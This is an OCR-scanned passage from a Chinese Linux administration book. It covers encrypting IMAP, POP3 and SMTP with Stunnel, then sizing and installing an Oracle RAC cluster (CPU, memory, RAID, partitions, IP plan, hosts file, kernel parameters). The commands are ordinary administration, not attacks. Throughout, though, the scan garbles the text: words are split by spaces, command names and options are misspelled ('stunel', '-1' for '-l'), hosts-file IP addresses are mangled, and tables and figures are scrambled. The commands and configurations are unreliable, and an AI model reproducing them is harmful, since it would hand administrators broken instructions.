本 节 从 安装 配置 和 实现 机 制 向 读者 概要 地 介绍 了 Postfix， 并 在 这 个 基础 上 设计 了 一 个 大 
型 的 邮件 系统 。 但 是 ， 本 节 对 Postfix 的 介绍 还 远 远 不 够 ， 比 如 利用 Postfix 来 实现 高 效 地 反 垃 
圾 、 反 病毒 以 及 Postfix 的 详细 配置 与 管理 等 。 读 者 可 以 通过 实践 来 学 习 使 用 Postfix， 并 在 实 
践 中 探索 Postfix 的 原理 ， 从 而 更 好 地 优化 和 配置 Posttix， 以 实现 更 加 强大 的 邮件 系统 。 


3.3 利用 Stunnel 加 密 保护 邮件 服务 器 


Stunnel 是 一 款 可 以 加 密 网 络 数 据 的 TCP 连接 工具 ， 可 工作 在 Unix、Linux 和 Windows 
平台 上 ， 采用 Client/Server 模式 ， 将 Client 端的 网 络 数据 采用 SSL 加 密 ， 安 全 传输 到 指定 的 
Server 端 再 进行 解密 还 原 ， 然 后 发 送 到 访问 的 服务 器 。 

Stunnel 很 好 地 解决 了 SSL 不 能 对 现 有 旧 的 应 用 程序 传输 数据 加 密 的 问题 。 在 Stunnel 出 现 之 
前 , 要 实现 安全 的 数据 传输 , 只 能 依靠 在 应 用 程序 之 中 添加 SSL 代码 的 方式 来 提高 安全 性 。 Stunnel 
基于 OpenSSL， 所 以 要 求 安装 OpenSSL， 并 进行 正确 的 配置 。Stunnel 可 以 向 不 启用 SSL 的 服务 
器 端 软件 提供 保护 却 不 需 对 守护 进程 的 编码 做 任何 修改 ,例如 , 可 以 使 用 Stunnel 保护 POP3、SMTP 
和 IMAP 服务 器 。Stunnel 最 新 版 本 为 stunel-4.33.tar.gz， 其 官网 为 www.stunnel.org。 
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3.3.1 安装 编译 Stunnel 


Stunnel 安装 非常 简单 ， 在 此 不 再 赣 述 ， 可 使 用 下 面 的 命令 完成 对 Stunnel 的 安装 : 


#wget http://www.stunnel.org/download/stunnel/src/stunnel-4.33.tar.gz 
#tar zxvf stunel-4.33.tar.gz 
#./configure;make;make install 


3.3.2 保障 IMAP 安全 


IMAP (Internet Message Access Protocol) 是 用 户 从 不 同 的 计算 机 访问 邮件 的 一 种 方式 。 
其 工作 方式 为 在 一 台中 央 计 算 机 上 存储 信息 , 并 且 人 允许 用 户 访问 信息 的 一 个 复制 。 用 户 可 以 让 
本 地 工作 站 和 服务 器 同步 ， 此 外 也 可 以 为 邮件 创建 一 个 文件 夹 ,并且 具 有 完全 的 访问 权限 。 通 
过 Stunnel 封装 IMAP 有 两 种 方法 。 


(1) 通过 Stunnel 直接 运行 IMAP 服务 
如 果 有 使 用 SSL 协议 连接 的 IMAP 客户 端 ， 则 推荐 使 用 这 种 方法 。 首 先 关 闭 imapd 守护 
进程 ， 然 后 使 用 重启 脚本 〈/etc/rc.d/rc.local) 中 的 命令 行 代 替 imapd， 使 用 如 下 命令 : 


/usr/sbin/stunel -p /usr/local/ssl/certs/stunel.pem -d 993 -r localhost:143 


这 个 命令 使 用 IMAPS 端口 (993) 上 指定 的 文件 运行 Stunnel，imapd 端口 监听 程序 的 代 
里 在 143 端口 上 运行 。 如 果 人 允许 非 SSL IMAP 客户 端 连接 到 标准 的 IMAP 端口 (143) ， 可 以 
配置 SSL IMAP 客户 端 连接 到 端口 IMAPS (993) 代替 : 


/usr/sbin/stunel -p /usr/local/ssl/certs/stunel.pem -d 993 -1 /usr/sbin/imapd 


(2) 使 用 xinetd 运行 安全 的 IMAP 

从 守护 进程 的 概念 可 以 看 出 , 对 于 系统 所 要 通过 的 每 一 种 服务 , 都 必须 运行 监听 某 个 端口 
连接 所 发 生 的 守护 进程 ， 这 通常 意味 着 资源 浪费 。 

为 了 解决 这 个 问题 ，Linux 引入 了 “网 络 守 护 进 程 服务 程序 ”的 概念 。xinetd 能 够 同时 监 
听 多 个 指定 的 端口 , 在 接受 用 户 请 求 时 ,能 够 根据 用 户 请 求 的 端口 不 同 ,启动 不 同 的 网 络 服务 
进程 处 理 这 些 用 户 请 求 。 可 以 把 xinetd 看 做 一 个 管理 启动 服务 的 管理 服务 器 , 把 一 个 客户 请 求 
交 给 程序 处 理 , 然后 启动 相应 的 守护 进程 。 如 果 使 用 xinetd 运行 IMAP 服务 ， 则 可 修改 配置 文 
件 (Jetc/xinetd.d/imapd》〉 如 下 : 


service imap 

{ 

disable=no 

socket type=stream 

wait=no 

user=root 

port=143 

server=/usr/sbin/stunel 

server args=stunel imapd -1 /usr/sbin/imapd -imapd 
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log on succes+=USERID 

log on failure+=USERID 
#env=VIRTDOMAIN=virtual .hostname 
} 


然后 向 超级 服务 程序 传递 SIGHUP 信号 ， 重 新 载 入 xinetd 配置 : 


killall -USR1 xinetd 


3.3.3 保障 POP3 安全 


为 了 使 用 SSL 连接 POP3 邮件 服务 ， 需 要 重新 配置 文件 脚本 ， 代 码 如 下 : 


service pop3s 

{ 

disable=no 

socket type=stream 
wait=no 

user=root 
server=/usr/sbin/stunel 
server args=stunel pop3s -1 /usr/sbin/ipop3d -ipop3d 
log_ on _ success+=USERID 
log on failure+=USERID 
3 


如 果 客 户 端 软件 不 能 使 用 基于 SSL 的 POP3 邮件 用 户 代 理 MUA， 则 可 以 使 用 POP3 重新 
定向 的 方法 。 


3.3.4 保障 SMTP 安全 


如 果 一 个 正在 运行 的 SMTP 服务 器 需要 允许 出 差 在 外 的 员工 向 内 部 网 络 发 送 多 个 邮件 ， 
则 可 以 进行 如 下 设 定 : 


/usr/local/sbin/stunel -d 25 -p /var/lib/ssl/certs/server.pem -r localhost: 
smtp 


这 样 就 能 保障 终端 用 户 和 邮件 服务 器 之 间 进 行 安全 的 SMTP 传输 。 邮 件 发 送 到 域 之 外 的 
邮件 服务 器 将 不 在 安全 范围 之 内 。 

Stunnel 安全 工具 可 以 为 两 个 网 络 或 多 个 网 络 的 邮件 服务 器 提供 安全 保障 。 即 使 用 户 是 
一 个 系统 管理 员 ， 而 不 是 开发 者 ，Stunnel 也 是 一 个 强大 的 工具 ， 因 为 可 以 向 不 启用 SSL 
的 服务 器 端 软 件 添 加 SSL。 例 如 ， 以 上 提 到 的 使 用 Stunnel 保护 POP3、SMTP 和 IMAP 服 
务 器 。 唯 一 不 尽 人 意 的 地 方 是 : 需要 使 用 这 些 服务 器 的 安全 版 本 , 客户 机 必须 是 可 识别 SSL 
的 。Stunnel 也 有 些 局 限 性 ， 如 在 服务 器 端 ， 当 前 只 能 够 透明 地 代理 Linux 客户 机 。 在 客户 
机 端 ， 不 容易 执行 充分 的 证 书 验 证 。 
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某 电子 产业 信息 集团 是 国内 较 大 的 一 家 IT 企业 集团 ， 旗 下 拥有 十 多 家 成 员 企业 和 两 家 控 
股 上 市 公司 ， 员工 总 数 傅 1.5 万 人 。 信 息 化 建设 有 十 余年 的 历史 ， 由 于 早期 的 存储 系统 是 采用 
UNIX 小 型 机 双 机 方案 。 其 典型 特征 是 主机 运行 、 备 机 等 待 ， 一 旦 主机 故障 ， 则 备 机 接管 这 种 
架构 ， 多 年 来 运 维 费用 一 直 居 高 不 下 ， 而 且 这 种 双 机 方案 中 备 机 在 绝 大 多 数 时 间 都 是 闲置 的 ; 
并 且 在 主机 发 生 故 障 进行 切换 时 存在 服务 中 断 的 问题 ,最 关键 的 问题 是 次 存储 系统 的 保修 合同 
已 过 期 ， 至 今 该 设备 供应 商 已 无 备件 更 换 ， 继 保 或 增 配 费用 相当 高 郧 。2010 年 还 出 现 过 一 次 
前 端 卡 故障 ， 对 现 有 信息 的 安全 稳定 带 来 了 严重 影响 。 

基于 上 述 原因 ， 公 司 高 层 决定 对 IDC 机 房 的 中 心 数据 存储 系统 设备 进行 升级 改造 。 改 造 
后 的 系统 对 存储 、 管 理 有 了 更 高 的 要 求 : 首先 ,要求 集中 的 数据 库 系统 能 够 高 效率 地 处 理 干 兆 
级 的 数据 量 和 上 亿 条 记录 量 的 大 表 ; 其 次 ， 因 为 并 发 度 高 ， 每 个 操作 涉及 的 数据 关系 复杂 ， 要 
求 数据 库 系统 能 够 有 效 地 解决 并 发 访问 过 程 中 的 数据 竞争 和 锁 机 制 ; 再 次 , 在 数据 集中 和 应 用 
集中 的 应 用 环境 下 ， 因 为 复杂 度 高 ， 要 求 数 据 库 能 够 采用 并 行 处 理 技术 , 通过 多 台数 据 库 主机 
并 行 处 理 来 提高 系统 的 处 理性 能 。 最 后 , 要 求 数据 库 系 统 可 靠 性 比较 高 ,即使 一 台 主 机 瘫痪 的 
情况 下 也 要 求 能 够 做 到 事务 处 理 不 间断 进行 。 

基于 集团 公司 信息 系统 所 处 理 数据 的 大 规模 性 和 复杂 性 , 在 技术 选 型 过 程 中 , 考虑 了 多 种 
方案 ， 其 中 Oracle 公司 拥有 多 年 的 数据 库 市 场 经 验 ，Oracle 数据 库 在 集群 、 高 可 用 性 、 数 据 
存储 、 安 全 功能 、 系 统管 理 和 内 容 管理 等 方面 提供 了 完整 和 先进 的 功能 ， 这 些 都 是 高 效率 运行 
数据 存储 的 关键 ， 所 以 决定 采用 Oracle RAC〔 集 群 数据 库 ) 作为 中 心 数 据 库 系统 ， 并 在 此 基 
础 上 提出 了 建立 在 中 间 件 基础 上 的 三 层 架构 解决 方案 ， 采 用 Oracle RAC 集群 数据 库 作 为 后 台 
数据 存储 管理 系统 ,以 中 间 件 系统 进行 进程 管理 , 从 而 能 够 很 好 地 解决 目前 数据 业务 集中 处 理 
后 ， 对 系统 处 理性 能 和 系统 稳定 性 的 要 求 。 

数据 库 系 统 改造 经 历 了 前 期 调研 、 初 步 设计 、 详 细 设计 与 实施 几 个 步骤 ， 历 经 数 月 之 后 ， 
现在 已 经 实现 了 连接 数据 库 高 可 用 性 ， 由 于 RAC 技术 能 给 集团 公司 节省 大 笔 的 开销 ， 今 后 不 
必 花 巨 资 购买 大 型 主机 和 不 菲 的 服务 费 来 满足 高 可 靠 性 的 要 求 ,更 不 必 担心 单 节 点 系统 故障 对 
公司 造成 难以 估计 的 损失 。 当 系统 需要 进一步 扩展 时 ,可 按 需 增加 节点 , 无 须 对 应 用 程序 进行 
任何 修改 , 也 无 须 更 换 新 的 服务 器 。 对 于 企业 用 户 ,可 以 选择 多 台 思 片 式 服务 器 来 组 成 集群 环 
境 , 节省 了 服务 器 的 占用 空间 , 降低 了 硬件 成 本 ; 操作 系统 可 以 选择 免费 、 开 放 、 稳 定 的 Linux 
系统 ， 因 为 Oracle 11g 是 在 Linux 平台 下 开发 测试 的 ， 尤 其 对 Redhat Linux 系统 的 支持 是 非常 
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好 的 。 企 业 网 格 计算 的 实现 ， 解 决 了 企业 信息 化 过 程 中 面临 的 难题 ， 降 低 了 企业 信息 化 成 本 。 
这 是 企业 网 格 计算 带 来 的 显著 优点 ,也 是 未 来 信息 技术 发 展 的 方向 。 我 们 在 系统 实施 中 遇 到 了 
不 少 问题 ， 也 积累 了 不 少 经 验 ， 下 面 介绍 Oracle 系统 规模 的 确定 问题 。 


4.1 确定 Oracle 系统 的 规模 


任何 系统 的 资源 都 是 有 上 限 的 ， 当 系统 的 使 用 接近 临界 时 ,系统 的 运行 状态 就 会 发 生 很 大 
变化 ， 究 其 原因 主要 是 ， 当 某 项 资源 (CPU 利用 率 达 到 或 接近 100% 或 是 磁盘 IO 接近 饱和 ) 
的 使 用 达到 其 界限 ,将 会 出 现 排 队 现象 ， 这 一 排队 就 出 现 相应 的 时 间 延 长 。 所 以 在 确定 Oracle 
系统 规模 的 时 候 就 要 清楚 地 知道 业务 系统 在 峰值 时 的 情况 和 稳定 时 的 工作 情况 , 这 里 指 的 峰值 
就 是 系统 运行 压力 最 大 的 一 个 时 间 段 ， 比 如 大 部 分 财务 系统 中 ,峰值 都 出 现在 每 个 月 、 每 个 季 
度 或 是 每 年 的 结束 期 间 。 所 以 ， 能 清楚 指导 这 个 事件 的 通常 是 业务 人 员 而 不 是 计算 机 专家 。 峰 
值 时 期 一 般 出 现在 员工 登录 系统 时 、 批 量 更 新 数据 时 、 备 份 系统 产生 报表 时 或 提交 大 量 报告 时 ， 
这 些 敏感 时 期 是 专业 人 员 尤 其 应 该 关注 的 。 

当然 有 人 会 说 提高 服务 器 的 配置 不 就 能 解决 系统 高 峰 给 数据 库 带 来 的 压力 了 吗 ? 为 了 取 
得 更 好 的 经 济 利益 , 在 硬件 配置 上 不 能 一 味 的 升级 ， 而 要 选择 适当 的 硬件 为 宜 。 在 调整 系统 规 
模 时 ， 要 知道 需要 多 少 资源 系统 才能 正常 运行 ， 以 及 在 不 升级 现 有 硬件 配置 的 情况 下 ， 系 统 还 
有 多 少 增长 空间 ， 所 以 在 调整 规模 时 就 需要 注意 CPU、 内 存 及 IO 子 系统 等 方面 的 情况 。 


4.1.1 CPU 规模 的 调整 


CPU 的 数量 及 速度 影响 到 系统 的 处 理 速度 。 如 果 有 足够 的 并 发 性 ， 可 以 增加 CPU 的 数量 
以 提高 任务 的 处 理性 能 。 但 是 如 果 只 有 一 个 处 理 线程 ， 则 只 能 在 一 个 CPU 上 运行 ， 此 时 增加 
CPU 的 数目 并 不 能 使 任务 处 理 得 更 快 ， 而 只 能 使 多 个 并 发 任务 更 快 地 完成 。 当 一 个 进程 必须 
等 待 其 他 进程 释放 CPU 时 会 发 生 排 队 ， 当 系统 具有 大 量 并 发 性 ， 或 者 存在 许多 进程 同时 运行 
时 ， 可 以 从 多 处 理 器 上 获得 很 多 好 处 。 此 外 ， 使 用 Oracle 并 行 查询 (OPQ) 选项 查询 并 行 化 
的 系统 (例如 有 400~500 人 同时 操作 Oracle 系统 查询 数据 的 情况 ) 也 能 从 多 处 理 器 中 受益 。 
用 户 也 不 用 担心 选用 多 CPU 后 会 浪费 CPU 的 资源 ， 因 为 Oracle 跟 上 了 硬件 发 展 的 步伐 ， 提 
供 了 很 多 面向 多 CPU 的 功能 。 早 在 Oracle 8i 时 代 ，Oracle 在 每 个 数据 库 函 数 中 都 实现 了 并 行 
性 ， 包 括 SQL 访问 (全 表 检 索 ) 、 并 行 数据 操作 和 并 行 恢复 。 在 目前 企业 的 Oracle 应 用 服务 
器 中 ， 拥 有 16 个 或 32 个 CPU 以 及 几 吉 比特 内 存 的 SGA 都 不 足 为 奇 了 。 

除了 CPU 的 数目 , 还 应 当 关 注 CPU cache 的 大 小 。 在 多 处 理 器 系统 中 ,一 个 较 大 的 cache 
可 以 提高 cache 命中 率 ， 从 而 可 减少 总 线 的 使 用 ， 提 高 系统 性 能 。 运 行 Oracle 时 ， 一 般 选 用 
cache 较 大 的 CPU， 即 使 它 的 芯片 主 频 可 能 更 慢 。 举 个 实际 的 例子 来 讲 ， 一 台 服 务 器 上 搭载 
Xeon X5650 的 处 理 器 ( 主 频 2.66GHz，L3 缓存 12MB) 会 比 搭载 Xen E3-1235 (3.2GHz L3， 
缓存 8MB) 的 服务 器 要 好 一 些 ， 虽 然 前 者 的 主 频 没有 后 者 高 ， 但 是 它 的 处 理 能 力 还 是 高 于 后 
者 。 
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目前 市 场 上 迅速 普及 了 一 种 64 位 /32 位 混合 型 处 理 器 ， 这 是 一 种 新 型 处 理 器 ， 本 质 上 是 
与 x86 操作 系统 和 64 位 存储 器 寻 址 完全 兼容 的 一 种 处 理 器 , 而 且 目前 Linux 和 Windows 都 支 
持 这 种 处 理 器 ，Linux 下 的 Oracle 11g 都 可 以 支持 64 位 模式 的 x86 体系 结构 。 这 些 系统 的 优 
势 在 于 可 以 运行 64 位 和 32 位 两 种 模式 的 操作 系统 。 如 果 运 行 的 是 64 位 操作 系统 ， 则 既 可 以 
运行 64 位 的 Oracle， 也 可 以 运行 32 位 的 Oracle， 总 之 为 了 获得 更 高 的 性 能 ， 建 议 使 用 64 位 
版 本 。 


4.1.2 内存 规模 的 调整 


系统 中 , Oracle 可 用 内 存 空间 的 大 小 决定 了 系统 中 可 以 运行 的 用 户 进程 和 查询 的 数目 及 类 
型 。 任 何 特定 时 刻 所 需 的 内 存 及 已 用 的 内 存 都 依赖 于 当前 运行 任务 的 数量 及 类 型 , 因而 难以 预 
测 。 

那么 如 何 为 特定 的 应 用 程序 确定 内 存 大 小 呢 ? 其 中 最 简单 的 方法 就 是 购买 尽 可 能 多 的 内 
存 ， 并 将 它们 分 配给 Oracle 进程 及 SGA。 严 格 地 说 ， 这 并 不 是 真正 意义 上 的 调整 ， 但 是 由 于 
现在 内 存 价格 与 几 年 前 相 比 已 经 相当 便宜 ， 因 此 这 也 成 为 一 个 可 行 的 方法 。 

我 们 知道 Oracle 使 用 的 内 存 可 以 当 作 两 个 独立 的 部 分 。SGA 位 于 共享 内 存 中 ， 共 享 内 存 
的 大 小 由 Linux 内 核 参数 〈 后 面 将 讲解 如 何 调 整 ) 决定 ， 并 从 一 个 特殊 的 内 存 池 中 分 配 出 来 ， 
内 存 交 换 时 不 能 被 换 出 ，Oracle 进程 的 内 存 则 可 以 被 换 出 。 当 考虑 SGA 的 大 小 时 ， 需 要 记 住 
的 是 Oracle 进程 可 能 需要 占用 大 量 的 内 存 ， 运 行 的 进程 越 多 ， 消 耗 的 内 存 也 越 多 。 

对 于 32 位 处 理 器 的 系统 ， 通 常 不 会 配置 超过 4GB 的 物理 内 存 ， 因 为 32 位 的 处 理 器 在 不 
使 用 物理 内 存 扩展 〈PAE) 技术 时 只 能 使 用 4GB 的 内 存 空间 ， 而 使 用 内 存 扩 展 又 会 产生 很 大 
的 开销 。 

此 外 ， 现 在 还 可 以 通过 PGA_AGGREGATE _ TARGET 参数 来 读 取 所 有 进程 占用 的 内 存 总 
量 ， 从 而 在 分 配 可 用 内 存 时 避免 产生 页 式 交 换 。 如 果 不 是 使 用 Oracle 9i 或 以 后 的 版 本 ， 则 手 
工 调整 内 存 的 方法 就 是 监视 系统 并 试 着 修改 所 需 的 内 存量 。 例 如 , 先 获 取 100 个 用 户 连接 时 的 
内 存 快照 (snapshot) ， 然 后 再 获取 200 个 用 户 连接 时 的 内 存 快照 ， 以 此 来 估计 每 个 用 户 所 需 
的 内 存 。 不 过 ,使 用 PGA AGGREGATETARGET 参数 以 后 就 不 再 需要 这 种 方法 了 ， 因 为 无 论 
有 多 少 个 用 户 ， 所 有 PGA 的 内 存 总 量 都 是 固定 的 。 


4.1.3 IO 子 系统 的 调整 


一 个 配置 适当 的 IO 系统 可 以 达到 优化 Oracle 性 能 的 目的 , 而 一 个 配置 不 当 的 IO 系统 则 
很 容易 造成 Oracle 的 瓶颈 。IO 子 系统 的 基本 组 件 就 是 磁盘 驱动 器 ， 把 排队 理论 用 在 这 里 解释 
最 恰当 不 过 了 ， 当 快要 达到 某 个 设备 的 带宽 极限 时 ,发 生 排 队 的 可 能 性 会 急剧 增 大 ， 也 就 是 说 
当 每 秒 的 IO 次 数 接近 150 时 《〈 这 是 设备 在 不 发 生 排队 的 最 大 次 数 ) ，LO 的 时 间 将 会 越 来 越 
长 。 

从 图 4.1 得 知 ， 越 靠近 理论 的 最 大 性 能 ， 磁 盘 延 迟 的 时 间 越 长 ， 由 于 Oracle 的 性 能 对 磁盘 
VO 的 延迟 非常 敏感 ， 所 以 要 尽量 避免 IO 过 载 的 现象 发 生 。 
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Queue Length vs. Utilization 


Queue Length 
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Utilization 


图 4.1 IO 队列 图 


4.1.4 ”RAID 磁盘 子 系统 


对 于 Oracle 数据 库 系 统 ， 最 常用 的 就 是 RAID (Redundant Array of Indexpensive Disks) 系 
统 , 它 的 主要 功能 就 是 提供 一 个 容错 的 1O 子 系统 和 支持 多 块 磁盘 组 合成 更 大 的 磁盘 ， 并 提高 
其 性 能 。 下 面 重点 比较 几 种 常见 RAID 级 别 的 性 能 : 


@ RAID0 的 性 能 最 高 ， 但 是 由 于 它 不 具有 容错 能 力 ， 导 致 没有 哪个 数据 库 会 选用 它 。 

@ RAID1 和 RAID0+1 的 写 操作 都 有 两 倍 开 销 ， 所 以 它们 的 容错 能 力 是 最 好 的 ， 但 成 本 
高 ， 如 果 数 据 库 压力 比较 大 ， 为 了 得 到 比较 好 的 性 能 ， 建 议 使 用 RAIDO0+1。 

@ RAID5 的 写 开 销 最 大 ， 每 次 写 操作 都 有 4 次 物理 IJO。 而 且 它 提供 了 容错 功能 ， 当 一 
块 盘 坏 掉 时 还 能 继续 工作 ， 它 是 本 节 介绍 的 几 种 RAID 中 最 流行 、 最 经 济 的 一 种 ， 如 
果 数 据 库 压力 并 不 大 ， 保 守 一 点 的 话 建议 选用 RAID5。 


4.2 ”Oracle RAC 设置 流程 


本 节 将 从 安装 Oracle 开始 讲 起 ， 逐 步 过 渡 到 RAC 安装 及 集群 的 测试 与 维护 。 在 Linux 上 
运行 Oracle， 首 先 要 正确 安装 和 配置 好 Linux 系统 (包括 足够 的 CPU、 内 存 、 磁 盘 空 间 等 )， 
由 于 设置 Oracle RAC 操作 非常 复杂 ， 所 以 笔者 总 结 出 了 17 个 步骤 ， 以 便 大 家 学 习 ， 流 程 图 
如 图 4.2 所 示 。 
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2.hosts 文 件 ， 

检查 所 需 软 
件 包 

7. 设 置 


测试 ASM 基 
OracleRAC 区 本 操作 与 
集群 维护 


图 4.2 ”Oracle RAC 安装 流程 图 


4.2.1 系统 安装 前 的 关键 配置 


先 花 一 点 时 间 讲 讲 安装 的 准备 工作 ， 不 要 拿 一 台 安 装 过 其 他 应 用 的 Linux 机 器 来 安装 
Oracle RAC 〈 那 也 太 不 够 重视 了 ) ， 要 求 是 在 全 新 的 系统 里 安装 ， 并 且 系统 分 区 可 以 参考 
表 4.1。 


表 4.1 系统 分 区 描述 
分 区 | 描 述 
/ 这 是 初始 的 分 区 ， 所 有 其 他 分 区 都 需要 创建 到 根 分 区 中 的 子 目 录 下 
交换 分 区 ,其 实 Linux 需要 的 交换 空间 比 大 多 数 Unix 系统 要 少 , 实际 上 4GB 或 更 大 内 存 的 Linux 
只 需 使 用 2GB 的 交换 空间 ， 而 必须 遵守 2~2.5 倍 内 存 大 小 。 这 是 由 于 只 有 在 内 存 耗 尽 时 才 会 使 


Se | 用 交换 空间 ， 理 论 上 讲 ， 在 超过 4GB 的 内 存 系统 中 ， 系 统 内 存 越 大 ， 用 到 交换 空间 的 可 能 性 就 
越 小 

二 这 是 Linux 用 户 的 主 目录 ，Oracle 用 户 账号 也 创建 在 其 中 ,但 “S$ORACLE HOME” 目录 常 常 不 
在 这 里 

此 目录 用 于 安装 程序 ， 但 Oracle 的 程序 并 不 在 这 里 ， 而 是 在 “$ORACLE_ HOME ”目录 中 
“$ORACLE HOME” 一 般 设 置 在 “/opt” 目 录 下 

ee 此 目录 用 于 存储 本 地 程序 及 配置 文件 。Oracle 用 这 个 目录 存放 某 些 程序 ， 但 大 部 分 还 是 放 在 


“SORACLE HOME” 目录 下 
/opt 用 户 安 装 可 选 程序 ， 通 常 “SORACLE_ HOME ”目录 就 在 此 处 
/u01 Oracle 安装 目录 
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Oracle RAC 解决 方案 的 网 络 拓扑 图 ， 如 图 4.3 所 示 。 


es 192. 163. 12 212 
NN 村 移 : 192. 168. 12. 240 


参数 文件 及 
归档 日 志文 件 


IsCsl-Target 
192. 168. 12. 246 


图 4.3 ”网络 拓扑 图 
使 用 的 硬件 如 下 : 


@ 服务 器 : 两 台 IBM X3950 M2。 
@ 操作 系统 : Red Hat 企业 版 5.5。 
@ 网 卡 : 双 千 兆 网 卡 (为 今后 做 双 网 卡 绑 定 打 基础 )。 


在 安装 Linux 时 建议 选中 如 下 系统 包 : 


@ 桌面 环境 : X-Window system Gnome Desktop。 
@ 开发 工具 : 全 部 选中 (包括 Gnome 和 Kde，X-software Development )。 


由 于 安装 RAC 数据 库 时 会 涉及 到 公用 网 络 和 私有 网 络 ， 因 此 接 下 来 需要 作 网 络 划分 和 地 
址 规划 ， 表 4.2 列 出 了 需 安装 的 RAC 数据 库 对 应 的 他 地 址 和 主机 名 。 


表 4.2 IP 地 址 分 配 表 


IP 地 址 主机 名 称 网 络 类 型 解析 文件 
192.168.12.231 Node-racl (公有 J 了 IP) /etc/hosts 
192.168.12.232 Node-rac2 (公有 了 PP) /etc/hosts 
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( 续 表 ) 


| IP 地 址 主机 名 称 网 络 类 型 解析 文件 
192.168.12.230 Node-vipl (漂移 全 ) /etc/hosts 


192.168.12.240 (漂移 人 P) /etc/hosts 
192.168.12.246 iSCSI-targe (公有 了 JIP) /etc/hosts 


10.10.10.1 Node-priv1 (私有 了 P) /etc/hosts 


| 10.10.102 | Node-priv2 (私有 也 ) | /etc/hosts 


在 配置 时 要 特别 注意 : 

@ 心跳 检测 : 为 实现 负载 均衡 ， 集 群 系统 采用 了 心跳 检测 技术 ， 目 前 实际 上 都 是 用 一 块 
独立 的 网 卡 来 跑 心 跳 ， 心 跳 数量 是 集群 节点 N-1， 例 如 4 台 主 机 做 集群 就 需要 三 根 心 
跳 线 ， 集 群 是 通过 心跳 保持 着 节点 间 内 部 的 有 限 通信 。 目 前 的 服务 都 配 有 多 网 卡 ， 所 
以 就 不 用 RS232 串口 线 做 心跳 。 在 设置 的 时 候 一 定 要 注意 心跳 网 卡 的 IP 和 服务 器 占 
用 的 卫 不 能 在 一 个 瑟 地址 段 。 

@ 漂移 IP: 在 集群 系统 中 ， 除 了 每 个 服务 节点 自身 固定 的 IP 外 ， 还 需要 有 一 个 漂移 卫 
地 址 ， 为 什么 取 这 个 名 字 呢 ?因为 这 个 他 不 是 固定 的 ， 比 如 两 台 机 器 做 HA， 正常 状 
态 下 漂移 卫 地 址 在 主 节点 上 ， 当 主 节点 出 现 故障 后 ,漂移 IP 自动 切换 到 备用 节点 上 。 
所 以 ， 为 保证 服务 的 高 可 用 性 ， 在 集群 系统 里 对 外 服务 的 IP 必须 提供 一 个 漂移 地 址 。 


安装 RAC 数据 库 需 要 的 软件 包 分 为 三 个 部 分 ,分 别 是 Oracle RAC 安装 程序 包 、Oracle ASMLib 
工具 包 以 及 系统 补丁 包 。 这 里 Oracle 的 安装 版 本 为 Oraclellg， 详 细 的 软件 包 信息 如 下 。 


(1) Oracle 11g Release 1 (11.1.0.6.0) 软件 包 
下 载 地 址 : 


http://www.oracle.com/technetwork/database/enterprise-edition/downloads/11 


1060-linuxsoft-085130.html 

软件 包 名 称 : 

linux llgR1 database 1013.zip 

linux x86 llgR1 clusterware.zip 

软件 包 说 明 : 一 共 需 要 下 载 两 个 安装 程序 ， 一 个 是 Oracle RAC 安装 程序 包 ， 另 一 个 是 
Oracle ClusterWare 安装 程序 包 。 

(2) Oracle ASMLib 工具 包 

下 载 地 址 : 


http://www.oracle.com/technetwork/topics/linux/downloads/rhel5-084877.html 
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软件 包 名 称 : 


oracleasmlib-2.0.4-1.el1l5.i386.rpm 
oracleasm-2.6.18-194.11.1.e15-2.0.5-1.e15.i686.rpm 


oracleasm-support-2.1.3-1.e15.i386.rpm 
软件 包 说 明 : 这 三 个 软件 包 是 使 用 ASM 存储 管理 方式 必须 的 驱动 工具 包 。 


(3) 如 果 选 用 的 是 Centos， 那 么 需要 下 载 系统 补丁 包 (Red Hat Linux 系统 可 略 过 ) 。 
下 载 地 址 : 


http://www.idevelopment.info/data/Oracle/DBA tips/OraclellgRAC/InstallllgR 


lRACONnCentOS51/RPMS/redhat-release-5-1.0.el5.centos.1.i386.rpm 
软件 包 名 称 : 
redhat-release-5-1.0.e15.centos.1.i386.rpm 

4.2.2 配置 主机 解析 文件 hosts 


为 了 使 每 个 主机 间 可 以 正常 通信 ,需要 在 node-racl 和 node-rac2 两 个 节点 上 修改 本 地 解析 
文件 ， 即 /etc/hosts 文件 ， 并 在 两 个 节点 上 添加 如 下 配置 信息 : 


192.168.12.231 node-racl 
192.168.12.232 node-rac2 
L92168=12=230 node-vipl 
L92160%、125240 node-vip2 
a node-privl 
bi 4 node-priv2 


在 每 个 节点 上 按照 下 面 的 命令 执行 相同 的 操作 : 


#rpm -q make binutils libaio-devel libaio elfutils-libelf-devel 
compat-libstdc++-33 libgcc gcc gcc-c++ glibc sysstat libstdc++ libstdct++-devel 


unixODBC-devel unixODBC 
如 果 提 示 某 个 软件 包 没有 安装 ， 请 安装 该 软件 包 。 
4.2.3 ”配置 系统 内 核 参 数 


由 于 Oracle 安装 时 对 内 核 参数 要 求 很 严格 ， 稍 有 设置 不 当 就 会 导致 安装 失败 ， 所 以 在 
设置 的 时 候 要 小 心 谨 慎 。 不 过 好 在 Linux 操作 系统 允许 动态 修改 这 些 参数 ， 并 且 内 核 参数 
调整 后 不 用 重新 启动 服务 器 。 修 改 内 核 参数 有 几 种 方法 ， 比 如 可 以 通过 修改 “/proc” 的 方 
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法 动态 修改 内 核 参数 ， 但 是 ， 当 系统 重新 启动 后 ， 原 来 设置 的 参数 值 就 会 丢失 ， 而 系统 每 
次 启动 都 会 自动 到 /etc/sysctl.conf 文件 中 读 取 内 核 参 数 , 因此 将 内 核 的 参数 配置 写 入 这 个 文 
件 中 ， 是 一 个 比较 好 的 选择 。 

Linux 需要 配置 的 参数 包括 信号 量 、 共 享 内 存 、 可 同时 打开 的 最 大 文件 数 以 及 端口 号 的 范 
围 。 信 和 号 量 参数 全 部 都 在 /proc/sys/kermel/sem 文件 中 ， 分 别 是 semmsl、semmns、semopm 和 
semmni， 这 些 参数 的 配置 必须 达到 表 4.3 的 最 低 标准 。 


表 4.3 参数 配置 的 标准 


描 述 


| semmsl 每 个 ID 的 最 大 信号 量 数目 | 
| semmms 系统 中 信号 量 的 最 大 数目 (必须 大 于 semmniX semmsl) | 
| semopm 每 次 信号 量 调用 的 最 大 操作 次 数 


信号 量 标示 符 的 最 大 数目 


SGA 的 大 小 由 /proc/sys/kernel/shmall、/proc/sys/kernel/shmmax 和 /proc/sys/kernel/shmmni 
等 文件 中 的 共享 内 存 参数 决定 ， 这 些 文件 描述 如 表 4.4 所 示 。 


表 4.4 参数 配置 的 标准 


297152 系统 共享 内 存 页 面 的 最 大 数目 


